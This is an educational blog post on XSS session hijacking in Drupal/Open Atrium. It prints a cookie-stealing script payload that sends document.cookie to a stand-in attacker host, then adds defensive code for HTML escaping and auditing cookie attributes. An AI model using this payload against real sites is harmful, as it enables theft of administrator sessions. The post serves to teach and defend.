Using XSS to steal access

We've talked about Cross-Site Scripting (XSS) before, and for good reason: it's a risk far too many sites are vulnerable to. XSS is scary because it runs in the context of the trusted relationship between your browser and a website; XSS can do everything you can do.

XSS cookie theft

Let's look at another example of an XSS exploit: stealing administrative access to a site.

  • An attacker will enter JavaScript that steals the visitor's browser cookie
  • An administrator will unknowingly execute this JavaScript
  • The administrator's browser will send the cookie to the attacker's website
  • The attacker will use the stolen cookie to act with the administrator's access on the site

Hijacking a session with a stolen cookie is a big deal, but this demo will take it one step further. Because the administrator will also be logged in to another site on the same domain, the attacker will receive that cookie as well. It's a two-for-one hack! Please watch this 5-minute video:

Some details

The exploit vector in the video is not standard. The community site was running Open Atrium which uses Markdown as the default Input Format and is not vulnerable to XSS. For demonstration purposes I granted Full HTML to authenticated users which is an insecure practice. Always be aware of what functionality you've granted to untrusted users.

The JavaScript used is a commonly known payload. It builds a new img element with the source set to a site controlled by the attacker and passes the visitor's cookies as a request parameter:

    <script>
    new Image().src =
      'http://evil.example.org/steal.php?cookies=' +
      encodeURI(document.cookie);
    </script>

When the above code is executed by your browser it makes a standard request to http://evil.example.org, passing along whatever cookies are set for the domain the JavaScript runs on. The attacker then needs only a way of monitoring for incoming requests and verifying the granted access.
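The following is an added example, not code from the original post or from Open Atrium, showing the configuration difference that made the demo possible: with Full HTML the comment text is inserted into the page as-is, while escaping it (the behaviour of a plain-text input format) turns the same payload into inert text. The comment body is a constructed sample built around the script shown above.

```javascript
// Added example (not from the original post): the insecure "Full HTML" setting
// beside the safe default of escaping untrusted input before it reaches a page.

// Constructed sample of a comment an untrusted user might submit. The script
// is the cookie-stealing payload quoted in the post.
const UNTRUSTED_COMMENT =
  "Nice site! <script>new Image().src=" +
  "'http://evil.example.org/steal.php?cookies='+encodeURI(document.cookie);</script>";

// HTML-escape the five characters that let text break out of a text node or a
// quoted attribute value. A browser renders the result literally.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Render a comment into a page fragment.
//   "full"    mirrors granting Full HTML to untrusted users: markup is kept as-is.
//   "escaped" is the safe default: markup is shown, never executed.
function renderComment(text, mode) {
  const body = mode === "full" ? text : escapeHtml(text);
  return `<div class="comment">${body}</div>`;
}

// Rough indicator used only to illustrate the outcome of each mode: does the
// fragment still contain a script element? (A real audit should use a parser.)
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Run both modes over the constructed comment and report which one would
// hand the browser an executable script.
function compareModes() {
  return {
    full: containsScriptElement(renderComment(UNTRUSTED_COMMENT, "full")),
    escaped: containsScriptElement(renderComment(UNTRUSTED_COMMENT, "escaped")),
  };
}

console.log(compareModes()); // { full: true, escaped: false }
```

The point of the comparison is that the payload itself is unchanged between the two runs; only the input format decides whether the administrator's browser treats it as markup or as text.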

The unique thing about the demo is that, because the administrator was logged into two sites on the same domain, the attacker's XSS stole both cookies, allowing the attacker to gain access to a site they (potentially) could not otherwise have compromised.

Mitigation

The likelihood of an attack of this type being successful is questionable, but the risk should be considered. XSS vulnerabilities are extremely common in web applications, so you should audit your configuration and custom code for adherence to Drupal best practices.
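As part of that configuration audit, the cookie attributes a site issues decide how much a payload like the one above can collect: HttpOnly keeps a cookie out of document.cookie, Secure keeps it off plain HTTP, and a Domain attribute set to a parent domain is exactly what let one payload pick up the session for a second site. The following is an added example, not code from the original post or from Drupal, that parses Set-Cookie headers and reports those weaknesses; the header values, cookie name and hostnames are constructed.

```javascript
// Added example (not from the original post): audit Set-Cookie headers for the
// attributes that limit what a cookie-stealing XSS payload can reach.

// Parse one Set-Cookie header value into its name, value and attribute map.
// Attribute names are lower-cased; flag attributes (Secure, HttpOnly) map to true.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attributes: {} };
  for (const attr of attrs) {
    if (!attr) continue;
    const [key, ...rest] = attr.split("=");
    cookie.attributes[key.toLowerCase()] = rest.length ? rest.join("=") : true;
  }
  return cookie;
}

// Audit a cookie issued by `host` (the hostname of the site that set it).
// Returns the cookie name and a list of human-readable findings.
function auditCookie(header, host) {
  const cookie = parseSetCookie(header);
  const a = cookie.attributes;
  const findings = [];
  if (!a.httponly) findings.push("missing HttpOnly: readable via document.cookie");
  if (!a.secure) findings.push("missing Secure: also sent over plain HTTP");
  if (a.domain) {
    // A leading dot is ignored by browsers; compare the bare domain to the host.
    const scope = String(a.domain).replace(/^\./, "").toLowerCase();
    if (scope !== host.toLowerCase()) {
      findings.push(`Domain=${a.domain}: shared with every site under ${scope}`);
    }
  }
  return { name: cookie.name, findings };
}

// Audit several headers from the same site.
function auditAll(headers, host) {
  return headers.map((h) => auditCookie(h, host));
}

// Constructed headers: the weak form beside the corrected one. The cookie name
// and value are placeholders, not from any real site.
const WEAK_HEADER = "SESSexample=deadbeef; Path=/; Domain=.example.org";
const HARDENED_HEADER = "SESSexample=deadbeef; Path=/; Secure; HttpOnly";
const SITE_HOST = "community.example.org";

console.log(auditAll([WEAK_HEADER, HARDENED_HEADER], SITE_HOST));
```

Run against the two constructed headers, the weak one yields three findings and the hardened one none. HttpOnly only denies the script the cookie value; a payload can still issue requests as the logged-in administrator from within the page, so escaping untrusted output remains the primary fix and the cookie attributes are defence in depth.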

Comments

That was very informative. I need to secure my website.